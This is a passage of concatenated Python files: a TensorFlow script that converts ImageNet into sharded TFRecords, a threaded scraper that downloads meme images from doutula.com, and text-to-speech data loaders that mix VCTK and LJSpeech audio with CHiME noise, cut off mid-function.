build_imagenet_data.py
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of floats specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of floats specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of floats specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of floats specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow.compat.v1 as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_boxes.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
# Encode str to bytes so the same wrapper works under Python 3.
if isinstance(value, str): value = value.encode('utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
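# A minimal reading-side sketch, not part of the original converter. It only
# illustrates the Example schema produced by _convert_to_example() above; the
# helper name and the feature subset shown here are illustrative, not an
# official API of this script.
def _parse_example_sketch(serialized_example):
  """Hypothetical helper: parse one record written by this converter."""
  feature_map = {
      'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
      'image/height': tf.FixedLenFeature([], dtype=tf.int64),
      'image/width': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/text': tf.FixedLenFeature([], dtype=tf.string,
                                             default_value=''),
      'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32),
  }
  # Decode the JPEG bytes back into an RGB tensor for downstream use.
  features = tf.parse_single_example(serialized_example, feature_map)
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label']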
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.GFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of integer pairs specifying the range of images each batch
should analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integers; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries, one per bounding box annotation for
the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integers; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries, one per bounding box annotation for
the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels is held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integers; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [
l.strip() for l in tf.gfile.GFile(labels_file, 'r').readlines()
]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain 0 or more entries, one per bounding box annotation for
the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.GFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.GFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
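# Hedged invocation sketch (the directory paths below are placeholders, not
# taken from the original repository); every flag shown is defined at the top
# of this script:
#
#   python build_imagenet_data.py \
#     --train_directory=/data/imagenet/train \
#     --validation_directory=/data/imagenet/validation \
#     --output_directory=/data/imagenet/tfrecords \
#     --labels_file=imagenet_lsvrc_2015_synsets.txt \
#     --imagenet_metadata_file=imagenet_metadata.txt \
#     --bounding_box_file=./imagenet_2012_bounding_boxes.csv \
#     --train_shards=1024 --validation_shards=128 --num_threads=8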
DouTuSpider.py
# Scrape meme images from doutula.com.
# Multithreading added on top of the original version: the threading library is
# Python's built-in module for creating and controlling threads.
# In my tests, grabbing every image on a page takes about 2 seconds, roughly 5x
# faster than the single-threaded version, a clear speedup.
# Further improvement: use lxml's etree instead of BeautifulSoup for extra speed.
# (A bounded thread-pool variant is sketched after storeImg() below.)
import os
import requests
import threading
from lxml import etree
from Download import dl
def get():
"""Create the main folder and start crawling."""
if not os.path.exists('/Users/yton/Documents/斗图'): os.mkdir('/Users/yton/Documents/斗图')
os.chdir('/Users/yton/Documents/斗图')
html = etree.HTML(dl.GetHtml('https://www.doutula.com/')) # parse the index page with etree
max_span = int(html.xpath('//li')[16].xpath('string(.)')) # get the largest page number
for page in range(1, max_span+1):
url = 'https://www.doutula.com/article/list/?page=' + str(page)
print('[Crawling]... url: ' + url)
html = etree.HTML(dl.GetHtml(url))
getDetail(html)
def getDetail(html):
"""Fetch the data on each detail page."""
href_list = [str(item.xpath('@href')[0]) for item in html.xpath('//a[@class="list-group-item"]')]
for url in href_list:
html = etree.HTML(dl.GetHtml(url))
dir_name = str(html.xpath('//li[@class="list-group-item"]//h3//blockquote//a')[0].xpath('string(.)'))
print('[Crawling]... ' + dir_name)
target_dir = '/Users/yton/Documents/斗图/' + dir_name
if not os.path.exists(target_dir): os.mkdir(target_dir)
os.chdir(target_dir)
getImgs(html)
def getImgs(html):
"""Get the image names and URLs."""
img_n = html.xpath('//div[@class="artile_des"]//table//a//img')
img_dict_list = [{'img_name': str(item.xpath('@alt')[0]), 'img_href': str(item.xpath('@src')[0])} for item in img_n]
for img_dict in img_dict_list:
threading.Thread(target=storeImg, args=(img_dict, )).start() # one download thread per image
def storeImg(img_dict):
"""Save an image to disk."""
print('[Crawling]... ' + img_dict['img_name'])
with open(img_dict['img_name'] + '.jpg', 'wb') as p:
p.write(requests.get('http:' + img_dict['img_href']).content)
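# Optional variant, not in the original script: the per-image threads above are
# unbounded, so a large album spawns one thread per image. A bounded pool via
# the standard library's concurrent.futures (Python 3) keeps thread and
# connection counts predictable. Sketch only; it reuses the same img_dict
# structure and storeImg() defined above.
def getImgsPooled(html, max_workers=8):
    """Hypothetical bounded-concurrency variant of getImgs()."""
    from concurrent.futures import ThreadPoolExecutor
    img_n = html.xpath('//div[@class="artile_des"]//table//a//img')
    img_dict_list = [{'img_name': str(item.xpath('@alt')[0]),
                      'img_href': str(item.xpath('@src')[0])} for item in img_n]
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # Consuming map() waits for every download submitted to the pool.
        list(pool.map(storeImg, img_dict_list))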
if __name__ == '__main__':
get()
mix_vctk_ljs.py
from pathlib import Path
import torch
import hp
from threading import Thread
from queue import Queue
import numpy as np
from audio.audio_io import load_to_torch
from audio.sfx import mix_with_snr
from torch.nn.utils.rnn import pad_sequence
from utils.text import text_to_sequence
from random import randint, sample, random
from .vctk_meta import vctk_meta
class CHIMELoader:
"""
Noise is quite small (500 hours of 16KHz Float)
"""
def __init__(self, wave_path, buffered=True):
self.wave_path = wave_path = list(wave_path.glob("*.wav"))
self.buffered = buffered
self.buffer = {}
print("CHiME : ", len(self.wave_path))
def __len__(self):
return len(self.wave_path)
def __cache__(self, item):
if item in self.buffer:
return self.buffer[item]
else:
return self.__read__(item)
def __read__(self, item):
wave = load_to_torch(str(self.wave_path[item]), hp.sampling_rate)
# Cache decoded waves so repeated samples skip disk I/O when buffering is on.
if self.buffered: self.buffer[item] = wave
return wave
def __getitem__(self, item: int):
return self.__cache__(item)
def sample(self):
id = randint(0, len(self) - 1)
return self[id]
class VCTKLoader:
def __init__(self, wave_path, txt_path):
wave_path = wave_path.glob("*.wav")
txt_path = txt_path.glob("*.txt")
id_wave_path = self.id_wave_path = {}
id_txt_path = self.id_txt_path = {}
for file in wave_path:
id_wave_path[file.stem] = file
for file in txt_path:
id_txt_path[file.stem] = file
ids = self.ids = []
for id in id_wave_path.keys():
if id in id_txt_path:
ids.append(id)
print("Found VCTK Wave ", len(self))
def __len__(self):
return len(self.ids)
def __getitem__(self, item):
if isinstance(item, int):
id = self.ids[item]
txt_path = self.id_txt_path[id]
wave_path = self.id_wave_path[id]
with open(str(txt_path), 'r') as f:
text = f.read().strip()
speaker = int(id[1:4])
male = vctk_meta[speaker][1] == "M"
speaker = speaker - 223
wave = load_to_torch(str(wave_path), hp.sampling_rate)
return text.strip(), wave, speaker, male
elif isinstance(item, slice):
items = []
for idx in range(item.start, item.stop):
items.append(self[idx])
return items
def sample(self):
while True:
id = randint(0, len(self) - 1)
text, wave, speaker, male = self[id]
if len(wave) > hp.min_sample_length and len(wave) < hp.max_sample_length:
return text, wave, speaker, male
class LJSpeechLoader:
def __init__(self, wave_path, txt_path):
wave_path = list(wave_path.glob("*.wav"))
self.id_text = id_text = {}
self.ids = ids = []
self.id_wave_path = id_wave_path = {}
with open(str(txt_path), 'r') as f:
for line in f:
l = line.strip().split('|')
id_text[l[0]] = l[2]
for file in wave_path:
id_wave_path[file.stem] = str(file)
if file.stem in id_text:
ids.append(file.stem)
print("Found LJSpeech Wave ", len(self))
def __len__(self):
return len(self.ids)
def __getitem__(self, item:int):
"""
Speaker ID is defined to be one here.
:param item: int of index
:return: "hello, world.", WAVE Torch CPU Float, speaker_id in int, False as female
"""
id = self.ids[item]
text = self.id_text[id]
wave_path = self.id_wave_path[id]
wave = load_to_torch(wave_path, hp.sampling_rate)
return text.strip(), wave, 1, False
def sample(self):
while True:
id = randint(0, len(self) - 1)
text, wave, speaker, male = self[id]
if len(wave) > hp.min_sample_length and len(wave) < hp.max_sample_length:
return text, wave, speaker, male
class MixingLoader:
def __init__(self, loaders, ratio):
"""
The 'loaders' and 'ratio' lists must be of the same length.
Simple implementation that does not allow changing the sampling ratio.
:param loaders: list of loaders like above two
:param ratio: list of int [1, 2] for ratios
"""
self.loaders = loaders
self.ratio = ratio
self.total_ratio = sum(ratio)
self.loader_lottery_pool = []
for loader, cnt in zip(loaders, ratio):
for _ in range(cnt):
self.loader_lottery_pool.append(loader)
self.lengths = [len(loader) for loader in loaders]
self.total_len = sum(self.lengths)
def __len__(self):
return self.total_len
def sample(self):
loader = sample(self.loader_lottery_pool, 1)
return loader[0].sample()
class NoiseAugmentLoader:
def __init__(self, speech_loader, noise_loader):
self.speech_loader = speech_loader
self.noise_loader = noise_loader
def __len__(self):
return len(self.speech_loader)
def sample(self, noise_augment_probability=hp.noise_augment_probability):
augment = random() < noise_augment_probability
text, wave, speaker, male = self.speech_loader.sample()
if augment:
noise_wave = self.noise_loader.sample()
begin = randint(0, len(noise_wave) - len(wave) - 1)
noise_segment = noise_wave[begin: len(wave) + begin]
mixed_wave = mix_with_snr(wave, noise_segment, randint(5, 25))
return text, mixed_wave, speaker, male, True
else:
return text, wave, speaker, male, False
class BinnedBatchLoader:
def __init__(
self,
q_size,
n_loading_threads,
stft: torch.nn.Module,
redundancy=5,
device=hp.device
):
self.loader = NoiseAugmentLoader(
speech_loader=MixingLoader(
[
LJSpeechLoader(hp.ljs_wav_path, hp.ljs_text_path),
VCTKLoader(hp.vctk_wav_path, hp.vctk_text_path)
], [1, 1] if hp.debug else [10, 90]
),
noise_loader=CHIMELoader(hp.part_chime_path)
)
self.stft = stft
# Loading From File System
self.device = device
self.loading_threads = []
self.loading_queue = Queue(maxsize=q_size)
for _ in range(n_loading_threads):
self.loading_threads.append(Thread(target=self.loading_thread))
self.loading_threads[-1].start()
self.r = 1
self.batch_size = 1
self.redundancy = redundancy
self.device = device
self.blocking_threads = Thread(target=self.blocking_thread)
self.blocking_queue = Queue(maxsize=5)
self.blocking_threads.start()
def get_state(self):
return self.loading_queue.qsize(), self.loading_queue.maxsize, self.blocking_queue.qsize(), self.blocking_queue.maxsize
def set_state(self, batch_size, r):
self.batch_size = batch_size
self.r = r
def get_batch(self):
return self.blocking_queue.get()
def loading_thread(self):
while True:
try:
text, wave, speaker, male, augmented = self.loader.sample()
phoneme = text_to_sequence(text, hp.cleaner_names)
phoneme = torch.from_numpy(np.int64(phoneme))
self.loading_queue.put((phoneme.to(self.device, non_blocking=True), wave.to(self.device, non_blocking=True), speaker, augmented))
except Exception as e:
print("Loading Thread Error", str(e))
def get_n(self, n:int):
"""
Getting list of phonemes and waves from loaded instances
:param n: int
:return: list of tuples (phoneme, wave, speaker, augmented, wave_len);
wave_len is used for sorting.
"""
items = []
for _ in range(n):
phoneme, wave, speaker, augmented = self.loading_queue.get(block=True)
items.append((phoneme, wave, speaker, augmented, len(wave)))
return items
def blocking_thread(self):
while True:
try:
items = self.get_n(self.batch_size * self.redundancy)
# sort items based on the length
# This has to be reversed since we are using the function pack_padded_sequence.
items = sorted(items, key=lambda x: x[-1], reverse=True)
batch_size = self.batch_size
r = self.r
for cnt in range(self.redundancy):
